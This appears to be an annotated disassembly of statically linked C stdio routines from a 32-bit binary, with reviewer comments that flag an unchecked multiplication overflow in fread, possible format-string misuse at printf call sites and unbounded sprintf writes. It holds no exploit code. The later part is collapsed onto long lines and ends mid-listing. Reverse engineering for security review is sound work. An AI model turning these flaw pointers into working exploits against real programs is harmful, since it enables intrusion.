loc_804F6A0:                                    ; CODE XREF: fprintf+Bj
                mov     eax, [edx]
                and     eax, 0FFFF0000h
                cmp     eax, 0FBAD0000h         ; stream magic check
                jnz     short loc_804F6C0
                lea     eax, [ebp+arg_8]        ; address of the first variadic argument (the va_list)
                push    eax
                push    ecx
                push    edx
                call    vfprintf
                mov     esp, ebp                ; frame teardown also drops the three arguments
                pop     ebp
                retn
; ───────────────────────────────────────────────────────────────────────────
                db 8Dh, 76h, 0                  ; three filler bytes (lea esi, [esi+0])
; ───────────────────────────────────────────────────────────────────────────

loc_804F6C0:                                    ; CODE XREF: fprintf+2Cj
                mov     __errno, 16h            ; bad magic: errno = 22
                mov     eax, 0FFFFFFFFh
                mov     esp, ebp
                pop     ebp
                retn
fprintf         endp

; ───────────────────────────────────────────────────────────────────────────
                align 4

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; fread(ptr, size, nmemb, fp): statically linked stdio routine.
;   arg_0 = ptr, arg_4 = size, arg_8 = nmemb, arg_C = fp.
;   Returns 0 with errno = 22 when fp fails the NULL / magic check, 0 when
;   size * nmemb is 0, nmemb when sub_8061D2C delivered the full byte count,
;   and otherwise (bytes delivered) / size.
; NOTE(review): size * nmemb is formed with a 32-bit imul and the overflow
; flag is never examined, so a product that wraps requests fewer bytes than
; the caller described. The only listed caller is main+525; check what that
; call passes.
fread           proc near                       ; CODE XREF: main+525p

var_C           = byte ptr -0Ch
arg_0           = dword ptr  8
arg_4           = dword ptr  0Ch
arg_8           = dword ptr  10h
arg_C           = dword ptr  14h

                push    ebp
                mov     ebp, esp
                push    edi
                push    esi
                push    ebx
                mov     ecx, [ebp+arg_0]        ; ecx = ptr
                mov     esi, [ebp+arg_4]        ; esi = size
                mov     edi, [ebp+arg_8]        ; edi = nmemb
                mov     edx, [ebp+arg_C]        ; edx = fp
                mov     ebx, esi
                imul    ebx, edi                ; ebx = size * nmemb, truncated to 32 bits
                test    edx, edx
                jz      short loc_804F6FD
                mov     eax, [edx]
                and     eax, 0FFFF0000h
                cmp     eax, 0FBAD0000h         ; stream magic check
                jz      short loc_804F70C

loc_804F6FD:                                    ; CODE XREF: fread+19j
                mov     __errno, 16h            ; errno = 22
                xor     eax, eax
                jmp     short loc_804F72A
; ───────────────────────────────────────────────────────────────────────────
                align 4

loc_804F70C:                                    ; CODE XREF: fread+27j
                test    ebx, ebx
                jnz     short loc_804F714
                xor     eax, eax                ; zero bytes requested: return 0 items
                jmp     short loc_804F72A
; ───────────────────────────────────────────────────────────────────────────

loc_804F714:                                    ; CODE XREF: fread+3Aj
                push    ebx
                push    ecx
                push    edx
                call    sub_8061D2C             ; (fp, ptr, bytes): returns bytes delivered; presumably the bulk-read primitive
                cmp     ebx, eax
                jz      short loc_804F728       ; full read: answer is nmemb
                xor     edx, edx
                div     esi                     ; short read: whole items = bytes / size (size is non-zero here because the product was non-zero)
                jmp     short loc_804F72A
; ───────────────────────────────────────────────────────────────────────────
                db 8Dh, 36h                     ; two filler bytes, left undecoded
; ───────────────────────────────────────────────────────────────────────────

loc_804F728:                                    ; CODE XREF: fread+4Aj
                mov     eax, edi

loc_804F72A:                                    ; CODE XREF: fread+35j fread+3Ej ...
                lea     esp, [ebp+var_C]        ; discards the three pushed arguments
                pop     ebx
                pop     esi
                pop     edi
                mov     esp, ebp
                pop     ebp
                retn
fread           endp

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; sub_804F734(fp, buf, n, delim, extract): copies bytes from the stream's
; read buffer into buf until delim is found, n bytes have been copied, or a
; refill reports -1. Called by fgets as (fp, buf, n-1, 0Ah, 1).
;   arg_0 = fp, arg_4 = buf, arg_8 = n (remaining byte budget),
;   arg_C = delimiter byte, arg_10 = delimiter handling:
;     < 0  delimiter is neither copied nor consumed,
;     = 0  delimiter is consumed but not copied,
;     > 0  delimiter is consumed and copied.
;   Returns the number of bytes written to buf.
;   fp+4 and fp+8 are used as the current read position and the end of
;   buffered data. Each chunk is clamped to the remaining budget before it is
;   searched or copied, so no more than n bytes are written to buf.
; NOTE(review): this matches the shape of GNU libio's _IO_getline;
; sub_8061A70 is presumably the buffer-refill (underflow) routine and
; sub_80575C0 presumably memchr - confirm with library signatures.
sub_804F734     proc near                       ; CODE XREF: fgets+3Ep

var_14          = byte ptr -14h
var_8           = dword ptr -8
var_4           = dword ptr -4
arg_0           = dword ptr  8
arg_4           = dword ptr  0Ch
arg_8           = dword ptr  10h
arg_C           = dword ptr  14h
arg_10          = dword ptr  18h

                push    ebp
                mov     ebp, esp
                sub     esp, 8
                push    edi
                push    esi
                push    ebx
                mov     edi, [ebp+arg_0]        ; edi = fp
                mov     edx, [ebp+arg_4]
                mov     [ebp+var_4], edx        ; var_4 = write cursor, starts at buf
                lea     esi, [esi]              ; no-op used as alignment filler

loc_804F748:                                    ; CODE XREF: sub_804F734+A2j
                mov     ebx, [edi+8]
                sub     ebx, [edi+4]            ; ebx = bytes currently buffered
                test    ebx, ebx
                jg      short loc_804F766
                push    edi
                call    sub_8061A70             ; buffer empty: ask for more data
                add     esp, 4
                cmp     eax, 0FFFFFFFFh
                jz      short loc_804F7DC       ; -1: stop and report what was copied so far
                mov     ebx, [edi+8]
                sub     ebx, [edi+4]            ; recompute the buffered byte count

loc_804F766:                                    ; CODE XREF: sub_804F734+1Cj
                cmp     [ebp+arg_8], ebx
                ja      short loc_804F76E       ; budget larger than buffered data: take it all
                mov     ebx, [ebp+arg_8]        ; otherwise clamp the chunk to the budget

loc_804F76E:                                    ; CODE XREF: sub_804F734+35j
                push    ebx
                mov     edx, [ebp+arg_C]
                push    edx
                mov     eax, [edi+4]
                push    eax
                call    sub_80575C0             ; (read position, delim, chunk length): search for the delimiter
                mov     esi, eax                ; esi = pointer to the delimiter, or 0
                add     esp, 0Ch
                test    esi, esi
                jz      short loc_804F7BC       ; not in this chunk: copy it all and loop
                mov     edx, [ebp+var_4]
                sub     edx, [ebp+arg_4]
                mov     [ebp+var_8], edx        ; var_8 = bytes copied by earlier iterations
                mov     ebx, esi
                sub     ebx, [edi+4]            ; ebx = bytes in front of the delimiter
                cmp     [ebp+arg_10], 0
                jl      short loc_804F7A1       ; negative: leave the delimiter unread
                inc     esi                     ; step the read position past the delimiter
                cmp     [ebp+arg_10], 0
                jle     short loc_804F7A1       ; zero: consumed but not copied
                inc     ebx                     ; positive: copy the delimiter too

loc_804F7A1:                                    ; CODE XREF: sub_804F734+63j
                                                ; sub_804F734+6Aj
                mov     eax, [edi+4]
                push    ebx
                push    eax
                mov     edx, [ebp+var_4]
                push    edx
                call    memcpy                  ; final chunk into the caller's buffer
                mov     [edi+4], esi            ; commit the new read position
                mov     eax, [ebp+var_8]
                add     eax, ebx                ; total = earlier bytes + this chunk
                jmp     short loc_804F7E2
; ───────────────────────────────────────────────────────────────────────────
                db 8Dh, 76h, 0                  ; three filler bytes (lea esi, [esi+0])
; ───────────────────────────────────────────────────────────────────────────

loc_804F7BC:                                    ; CODE XREF: sub_804F734+4Fj
                mov     eax, [edi+4]
                push    ebx
                push    eax
                mov     edx, [ebp+var_4]
                push    edx
                call    memcpy                  ; copy the whole chunk
                add     esp, 0Ch
                add     [edi+4], ebx            ; advance the read position
                add     [ebp+var_4], ebx        ; advance the write cursor
                sub     [ebp+arg_8], ebx        ; shrink the remaining budget
                jnz     loc_804F748             ; budget left: fetch the next chunk

loc_804F7DC:                                    ; CODE XREF: sub_804F734+2Aj
                mov     eax, [ebp+var_4]
                sub     eax, [ebp+arg_4]        ; bytes copied = cursor - buf

loc_804F7E2:                                    ; CODE XREF: sub_804F734+83j
                lea     esp, [ebp+var_14]       ; discards memcpy arguments left by the delimiter path
                pop     ebx
                pop     esi
                pop     edi
                mov     esp, ebp
                pop     ebp
                retn
sub_804F734     endp

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; printf(format, ...): statically linked stdio routine.
;   arg_0 = format, arg_4 = first variadic argument.
;   Forwards to vfprintf(unk_8078750, format, &arg_4) and returns its result;
;   unk_8078750 is therefore this build's stdout stream object.
; NOTE(review): the format pointer comes straight from the caller; when
; reviewing call sites (getanswer+564, getanswer+59F, ...) check that each
; one passes a constant format string.
printf          proc near                       ; CODE XREF: getanswer+564p
                                                ; getanswer+59Fp ...

arg_0           = dword ptr  8
arg_4           = byte ptr  0Ch

                push    ebp
                mov     ebp, esp
                mov     edx, [ebp+arg_0]        ; edx = format
                lea     eax, [ebp+arg_4]        ; address of the first variadic argument
                push    eax
                push    edx
                push    offset unk_8078750      ; fixed output stream
                call    vfprintf
                mov     esp, ebp                ; frame teardown also drops the three arguments
                pop     ebp
                retn
printf          endp

; ───────────────────────────────────────────────────────────────────────────
                db 3 dup(90h)                   ; three NOP bytes of padding

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; sprintf(dest, format, ...): statically linked stdio routine.
;   arg_0 = dest, arg_4 = format, arg_8 = first variadic argument.
;   Forwards to sub_804F820(dest, format, &arg_8) and returns its result.
; NOTE(review): no destination size is passed anywhere on this path
; (sub_804F820 sets the string stream up with length -1), so output is
; bounded only by the format and its arguments. For each call site
; (main+4D7, main+A12, ...) compare the destination buffer size with the
; longest string the format can produce.
sprintf         proc near                       ; CODE XREF: main+4D7p main+A12p ...

arg_0           = dword ptr  8
arg_4           = dword ptr  0Ch
arg_8           = byte ptr  10h

                push    ebp
                mov     ebp, esp
                mov     ecx, [ebp+arg_0]        ; ecx = dest
                mov     edx, [ebp+arg_4]        ; edx = format
                lea     eax, [ebp+arg_8]        ; address of the first variadic argument
                push    eax
                push    edx
                push    ecx
                call    sub_804F820
                mov     esp, ebp
                pop     ebp
                retn
sprintf         endp

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame hidden

; sub_804F820(dest, format, args): formats into memory through a temporary
; stream object built on the stack; sprintf is its only listed caller.
;   arg_0 = dest, arg_4 = format, arg_8 = pointer to the variadic arguments.
;   var_60 is the stream object; var_4C / var_48 / var_10 are its fields at
;   +14h / +18h / +50h (write position, write limit and table pointer, by
;   the way vfprintf and fclose use the same offsets).
;   Returns vfprintf's result after appending a terminating zero byte.
; NOTE(review): this matches the shape of vsprintf in GNU libio;
; sub_8052E80 is presumably the "attach a caller buffer to a string stream"
; initialiser, and the 0FFFFFFFFh it receives presumably means "no length
; limit" - confirm.
sub_804F820     proc near                       ; CODE XREF: sprintf+Fp

var_6C          = byte ptr -6Ch
var_60          = byte ptr -60h
var_4C          = dword ptr -4Ch
var_48          = dword ptr -48h
var_10          = dword ptr -10h
arg_0           = dword ptr  8
arg_4           = dword ptr  0Ch
arg_8           = dword ptr  10h

                push    ebp
                mov     ebp, esp
                sub     esp, 60h                ; room for the temporary stream object
                push    edi
                push    esi
                push    ebx
                mov     ebx, [ebp+arg_0]        ; ebx = dest
                mov     esi, [ebp+arg_8]        ; esi = argument pointer
                push    0
                lea     edi, [ebp+var_60]       ; edi = temporary stream
                push    edi
                call    sub_8061F34             ; (stream, 0): same initialiser fopen uses
                mov     [ebp+var_10], offset unk_80787FC ; table pointer at stream+50h
                push    ebx
                push    0FFFFFFFFh
                push    ebx
                push    edi
                call    sub_8052E80             ; (stream, dest, -1, dest)
                push    esi
                mov     edx, [ebp+arg_4]
                push    edx
                push    edi
                call    vfprintf                ; (stream, format, args)
                mov     ebx, eax                ; keep vfprintf's result as the return value
                add     esp, 24h                ; pops the nine arguments of the three calls above
                mov     eax, [ebp+var_4C]
                cmp     [ebp+var_48], eax
                ja      short loc_804F870       ; room left: store the terminator directly
                push    0
                push    edi
                call    sub_8061910             ; (stream, 0): vfprintf calls the same routine to emit one byte when the buffer is full
                jmp     short loc_804F879
; ───────────────────────────────────────────────────────────────────────────
                db 8Dh, 76h, 0                  ; three filler bytes (lea esi, [esi+0])
; ───────────────────────────────────────────────────────────────────────────

loc_804F870:                                    ; CODE XREF: sub_804F820+41j
                mov     eax, [ebp+var_4C]
                mov     byte ptr [eax], 0       ; terminate the output
                inc     [ebp+var_4C]

loc_804F879:                                    ; CODE XREF: sub_804F820+4Bj
                mov     eax, ebx
                lea     esp, [ebp+var_6C]       ; discards arguments left by the sub_8061910 path
                pop     ebx
                pop     esi
                pop     edi
                mov     esp, ebp
                pop     ebp
                retn
sub_804F820     endp

; ───────────────────────────────────────────────────────────────────────────
                db 3 dup(90h)                   ; three NOP bytes of padding

; ███████████████ S U B R O U T I N E ███████████████████████████████████████

; Attributes: bp-based frame
hidden vfprintf proc near ; CODE XREF: fprintf+34p printf+10p ... var_500 = byte ptr -500h var_4F0 = dword ptr -4F0h var_4EC = dword ptr -4ECh var_4E8 = dword ptr -4E8h var_4E4 = dword ptr -4E4h var_4E0 = dword ptr -4E0h var_4DC = dword ptr -4DCh var_4D8 = dword ptr -4D8h var_4D4 = dword ptr -4D4h var_4D0 = dword ptr -4D0h var_4CC = dword ptr -4CCh var_4C8 = dword ptr -4C8h var_4C4 = dword ptr -4C4h var_4C0 = dword ptr -4C0h var_4BC = dword ptr -4BCh var_4B8 = dword ptr -4B8h var_4B4 = dword ptr -4B4h var_4B0 = dword ptr -4B0h var_4AC = dword ptr -4ACh var_4A8 = dword ptr -4A8h var_4A4 = dword ptr -4A4h var_4A0 = byte ptr -4A0h var_49C = dword ptr -49Ch var_498 = dword ptr -498h var_494 = byte ptr -494h var_490 = dword ptr -490h var_48C = dword ptr -48Ch var_488 = dword ptr -488h var_484 = dword ptr -484h var_480 = dword ptr -480h var_47C = dword ptr -47Ch var_478 = dword ptr -478h var_474 = dword ptr -474h var_470 = dword ptr -470h var_46C = dword ptr -46Ch var_468 = dword ptr -468h var_464 = dword ptr -464h var_460 = dword ptr -460h var_45C = dword ptr -45Ch var_458 = dword ptr -458h var_450 = dword ptr -450h var_43C = dword ptr -43Ch var_438 = dword ptr -438h var_434 = dword ptr -434h var_430 = dword ptr -430h var_42C = byte ptr -42Ch var_428 = dword ptr -428h var_424 = dword ptr -424h var_420 = dword ptr -420h var_41C = dword ptr -41Ch var_418 = dword ptr -418h var_414 = dword ptr -414h var_410 = dword ptr -410h var_40C = dword ptr -40Ch var_408 = byte ptr -408h var_404 = dword ptr -404h var_400 = dword ptr -400h var_3FC = dword ptr -3FCh var_3F8 = dword ptr -3F8h var_3F4 = dword ptr -3F4h var_3F0 = dword ptr -3F0h var_3EC = dword ptr -3ECh var_3E8 = byte ptr -3E8h var_1 = byte ptr -1 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 4F4h push edi push esi push ebx mov esi, [ebp+arg_4] cmp [ebp+arg_0], 0 jz loc_8050E68 mov ecx, [ebp+arg_0] mov edx, [ecx] and edx, 0FFFF0000h cmp edx, 0FBAD0000h jnz loc_8050E68 test 
byte ptr [ecx], 8 jnz loc_8050E68 test esi, esi jz loc_8050E68 mov ebx, [ebp+arg_0] test byte ptr [ebx], 2 jz short loc_804F8E4 mov edi, [ebp+arg_8] push edi push esi push ebx call sub_8052DE8 jmp loc_80529BE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804F8E4: ; CODE XREF: vfprintf+47j mov [ebp+var_464], 0 push 0 push 0 push 0 call sub_805602C add esp, 0Ch mov [ebp+var_4F0], esi cmp byte ptr [esi], 0 jz short loc_804F945 nop loc_804F908: ; CODE XREF: vfprintf+BBj mov ecx, [ebp+var_4F0] cmp byte ptr [ecx], 25h jz short loc_804F945 cmp byte ptr [ecx], 0 jge short loc_804F929 push 1 push ecx push 0 call sub_805602C add esp, 0Ch test eax, eax jg short loc_804F934 loc_804F929: ; CODE XREF: vfprintf+8Ej inc [ebp+var_4F0] jmp short loc_804F93A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804F934: ; CODE XREF: vfprintf+9Fj add [ebp+var_4F0], eax loc_804F93A: ; CODE XREF: vfprintf+A7j mov ebx, [ebp+var_4F0] cmp byte ptr [ebx], 0 jnz short loc_804F908 loc_804F945: ; CODE XREF: vfprintf+7Dj vfprintf+89j mov edi, [ebp+var_4F0] mov [ebp+var_45C], edi mov [ebp+var_400], edi mov ecx, [ebp+arg_0] mov edx, [ecx+50h] mov ebx, [ebp+var_45C] sub ebx, esi push ebx push esi push ecx mov edx, [edx+34h] call edx add esp, 0Ch cmp eax, ebx jnz loc_8050E72 ; case 0x0 add [ebp+var_464], eax mov edx, [ebp+var_400] cmp byte ptr [edx], 0 jz loc_80529B8 mov [ebp+var_460], 0 mov edi, [ebp+arg_8] mov [ebp+var_468], edi mov [ebp+var_458], 0FFFFFFFFh lea esi, [esi] loc_804F9AC: ; CODE XREF: vfprintf+15D4j mov [ebp+var_46C], 0 mov [ebp+var_470], 0 mov [ebp+var_474], 0 mov [ebp+var_478], 0 mov [ebp+var_47C], 0 xor esi, esi mov [ebp+var_480], 0 mov [ebp+var_484], 0 mov [ebp+var_48C], 0 mov [ebp+var_490], 0FFFFFFFFh mov [ebp+var_494], 20h mov edx, [ebp+var_400] inc edx mov [ebp+var_400], edx mov dl, [edx] mov [ebp+var_4A0], dl and edx, 0FFh cmp edx, 78h ; switch 121 cases ja loc_8050E7C ; default 
jmp ds:off_804FA3C[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h off_804FA3C dd offset loc_8050E72, 1Fh dup(offset loc_8050E7C), offset loc_804FC20 ; DATA XREF: vfprintf+1ABr dd 2 dup(offset loc_8050E7C), offset loc_804FC20, offset loc_8050E7C ; jump table for switch statement dd offset loc_8050464, offset loc_8050E7C, offset loc_804FC20 dd 2 dup(offset loc_8050E7C), offset loc_804FF30, offset loc_804FC20 dd offset loc_8050E7C, offset loc_804FC20, offset loc_80500AC dd offset loc_8050E7C, offset loc_804FC20, 9 dup(offset loc_805000C) dd 0Bh dup(offset loc_8050E7C), offset loc_8050974, offset loc_8050E7C dd offset loc_8050974, 4 dup(offset loc_8050E7C), offset loc_8050218 dd 0Bh dup(offset loc_8050E7C), offset loc_805058C, offset loc_8050E7C dd offset loc_8050218, 8 dup(offset loc_8050E7C), offset loc_8050A7C dd offset loc_80504A0, 3 dup(offset loc_8050974), offset loc_8050218 dd offset loc_80504A0, 2 dup(offset loc_8050E7C), offset loc_8050218 dd offset loc_8050DA0, offset loc_8050D10, offset loc_8050580 dd offset loc_8050CA4, offset loc_8050218, offset loc_8050E7C dd offset loc_8050B34, offset loc_8050E7C, offset loc_8050574 dd 2 dup(offset loc_8050E7C), offset loc_805058C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804FC20: ; CODE XREF: vfprintf+1ABj ; vfprintf+6A2j ; DATA XREF: ... 
movzx edx, [ebp+var_4A0] ; case 0x20 cmp edx, 78h ; switch 121 cases ja loc_8050E7C ; default jmp ds:off_804FC38[edx*4] ; switch jump ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 off_804FC38 dd offset loc_8050E72, 1Fh dup(offset loc_8050E7C), offset loc_804FE1C ; DATA XREF: vfprintf+3A8r dd 2 dup(offset loc_8050E7C), offset loc_804FE54, offset loc_8050E7C ; jump table for switch statement dd offset loc_8050464, offset loc_8050E7C, offset loc_804FE80 dd 3 dup(offset loc_8050E7C), offset loc_804FE2C, offset loc_8050E7C dd offset loc_804FE3C, offset loc_80500AC, offset loc_8050E7C dd offset loc_804FE64, 9 dup(offset loc_805000C), 0Bh dup(offset loc_8050E7C) dd offset loc_8050974, offset loc_8050E7C, offset loc_8050974 dd 4 dup(offset loc_8050E7C), offset loc_8050218, 0Bh dup(offset loc_8050E7C) dd offset loc_805058C, offset loc_8050E7C, offset loc_8050218 dd 8 dup(offset loc_8050E7C), offset loc_8050A7C, offset loc_80504A0 dd 3 dup(offset loc_8050974), offset loc_8050218, offset loc_80504A0 dd 2 dup(offset loc_8050E7C), offset loc_8050218, offset loc_8050DA0 dd offset loc_8050D10, offset loc_8050580, offset loc_8050CA4 dd offset loc_8050218, offset loc_8050E7C, offset loc_8050B34 dd offset loc_8050E7C, offset loc_8050574, 2 dup(offset loc_8050E7C) dd offset loc_805058C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804FE1C: ; CODE XREF: vfprintf+3A8j ; DATA XREF: vfprintf+3B0o mov [ebp+var_470], 1 ; case 0x20 jmp loc_804FF12 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804FE2C: ; CODE XREF: vfprintf+3A8j ; DATA XREF: vfprintf+3B0o mov [ebp+var_478], 1 ; case 0x2b jmp loc_804FF12 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804FE3C: ; CODE XREF: vfprintf+3A8j ; DATA XREF: vfprintf+3B0o mov [ebp+var_474], 1 ; case 0x2d mov [ebp+var_494], 20h jmp loc_804FF12 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804FE54: ; CODE XREF: vfprintf+3A8j ; DATA XREF: vfprintf+3B0o mov [ebp+var_46C], 1 ; case 0x23 jmp 
loc_804FF12 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804FE64: ; CODE XREF: vfprintf+3A8j ; DATA XREF: vfprintf+3B0o cmp [ebp+var_474], 0 ; case 0x30 jnz loc_804FF12 mov [ebp+var_494], 30h jmp loc_804FF12 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804FE80: ; CODE XREF: vfprintf+3A8j ; DATA XREF: vfprintf+3B0o mov [ebp+var_47C], 1 ; case 0x27 cmp [ebp+var_458], 0FFFFFFFFh jnz short loc_804FF12 mov edx, dword_8078890 mov edx, [edx+10h] mov [ebp+var_4D8], edx xor al, al mov [ebp+var_4EC], edx mov edi, edx cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx dec edx push edx mov ecx, [ebp+var_4D8] push ecx lea edx, [ebp+var_3F8] push edx call sub_805602C add esp, 0Ch test eax, eax jg short loc_804FEE6 mov edx, dword_8078890 mov edx, [edx+10h] movzx edx, byte ptr [edx] mov [ebp+var_3F8], edx loc_804FEE6: ; CODE XREF: vfprintf+64Aj mov edx, dword_8078890 mov edx, [edx+14h] mov [ebp+var_458], edx cmp byte ptr [edx], 0 jz short loc_804FF08 cmp byte ptr [edx], 0FFh jz short loc_804FF08 cmp [ebp+var_3F8], 0 jnz short loc_804FF12 loc_804FF08: ; CODE XREF: vfprintf+670j ; vfprintf+675j mov [ebp+var_458], 0 loc_804FF12: ; CODE XREF: vfprintf+59Ej ; vfprintf+5AEj ... 
mov edx, [ebp+var_400] inc edx mov [ebp+var_400], edx mov dl, [edx] mov [ebp+var_4A0], dl cmp dl, 2Ah jnz loc_804FC20 ; case 0x20 loc_804FF30: ; CODE XREF: vfprintf+1ABj ; DATA XREF: vfprintf+1B4o mov edx, [ebp+var_400] ; case 0x2a inc edx mov [ebp+var_400], edx mov [ebp+var_3FC], edx movzx edx, byte ptr [edx] mov ebx, dword_8078FA0 mov [ebp+var_4E4], ebx test byte ptr [ebx+edx*2+1], 8 jz short loc_804FFD6 add edx, 0FFFFFFD0h mov [ebp+var_4F0], edx inc [ebp+var_3FC] mov eax, [ebp+var_3FC] movzx edx, byte ptr [eax] test byte ptr [ebx+edx*2+1], 8 jz short loc_804FFBE mov [ebp+var_4E4], ebx lea esi, [esi] loc_804FF80: ; CODE XREF: vfprintf+734j mov edi, [ebp+var_4F0] lea edx, [edi+edi*8] lea edx, [edx+edi-30h] mov [ebp+var_4E0], edx movzx edx, byte ptr [eax] add edx, [ebp+var_4E0] mov [ebp+var_4F0], edx inc [ebp+var_3FC] mov eax, [ebp+var_3FC] movzx edx, byte ptr [eax] mov ecx, [ebp+var_4E4] test byte ptr [ecx+edx*2+1], 8 jnz short loc_804FF80 loc_804FFBE: ; CODE XREF: vfprintf+6EEj cmp [ebp+var_4F0], 0 jz short loc_804FFD6 mov edx, [ebp+var_3FC] cmp byte ptr [edx], 24h jz loc_8050E7C ; default loc_804FFD6: ; CODE XREF: vfprintf+6CFj ; vfprintf+73Dj add [ebp+arg_8], 4 mov ebx, [ebp+arg_8] mov ebx, [ebx-4] mov [ebp+var_48C], ebx test ebx, ebx jge loc_805009D neg ebx mov [ebp+var_48C], ebx mov [ebp+var_494], 20h mov [ebp+var_474], 1 jmp loc_805009D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_805000C: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ; DATA XREF: ... 
mov edx, [ebp+var_400] ; case 0x31 movzx edx, byte ptr [edx] mov [ebp+var_4F0], edx add [ebp+var_4F0], 0FFFFFFD0h inc [ebp+var_400] mov eax, [ebp+var_400] movzx edx, byte ptr [eax] mov edi, dword_8078FA0 mov [ebp+var_4E4], edi test byte ptr [edi+edx*2+1], 8 jz short loc_8050082 loc_8050044: ; CODE XREF: vfprintf+7F8j mov ecx, [ebp+var_4F0] lea edx, [ecx+ecx*8] lea edx, [edx+ecx-30h] mov [ebp+var_4E0], edx movzx edx, byte ptr [eax] add edx, [ebp+var_4E0] mov [ebp+var_4F0], edx inc [ebp+var_400] mov eax, [ebp+var_400] movzx edx, byte ptr [eax] mov ebx, [ebp+var_4E4] test byte ptr [ebx+edx*2+1], 8 jnz short loc_8050044 loc_8050082: ; CODE XREF: vfprintf+7BAj mov edi, [ebp+var_4F0] mov [ebp+var_48C], edi mov edx, [ebp+var_400] cmp byte ptr [edx], 24h jz loc_8050E7C ; default loc_805009D: ; CODE XREF: vfprintf+760j ; vfprintf+77Fj mov edx, [ebp+var_400] cmp byte ptr [edx], 2Eh jnz loc_8050218 ; case 0x4c loc_80500AC: ; CODE XREF: vfprintf+1ABj ; vfprintf+3A8j ; DATA XREF: ... inc [ebp+var_400] ; case 0x2e mov edx, [ebp+var_400] cmp byte ptr [edx], 2Ah jnz loc_805017C inc [ebp+var_400] mov edx, [ebp+var_400] mov [ebp+var_404], edx movzx edx, byte ptr [edx] mov ecx, dword_8078FA0 mov [ebp+var_4E4], ecx test byte ptr [ecx+edx*2+1], 8 jz short loc_8050166 add edx, 0FFFFFFD0h mov [ebp+var_4F0], edx inc [ebp+var_404] mov eax, [ebp+var_404] movzx edx, byte ptr [eax] test byte ptr [ecx+edx*2+1], 8 jz short loc_805014E mov [ebp+var_4E4], ecx lea esi, [esi] loc_8050110: ; CODE XREF: vfprintf+8C4j mov ebx, [ebp+var_4F0] lea edx, [ebx+ebx*8] lea edx, [edx+ebx-30h] mov [ebp+var_4E0], edx movzx edx, byte ptr [eax] add edx, [ebp+var_4E0] mov [ebp+var_4F0], edx inc [ebp+var_404] mov eax, [ebp+var_404] movzx edx, byte ptr [eax] mov edi, [ebp+var_4E4] test byte ptr [edi+edx*2+1], 8 jnz short loc_8050110 loc_805014E: ; CODE XREF: vfprintf+87Ej cmp [ebp+var_4F0], 0 jz short loc_8050166 mov edx, [ebp+var_404] cmp byte ptr [edx], 24h jz loc_8050E7C ; default loc_8050166: ; CODE XREF: 
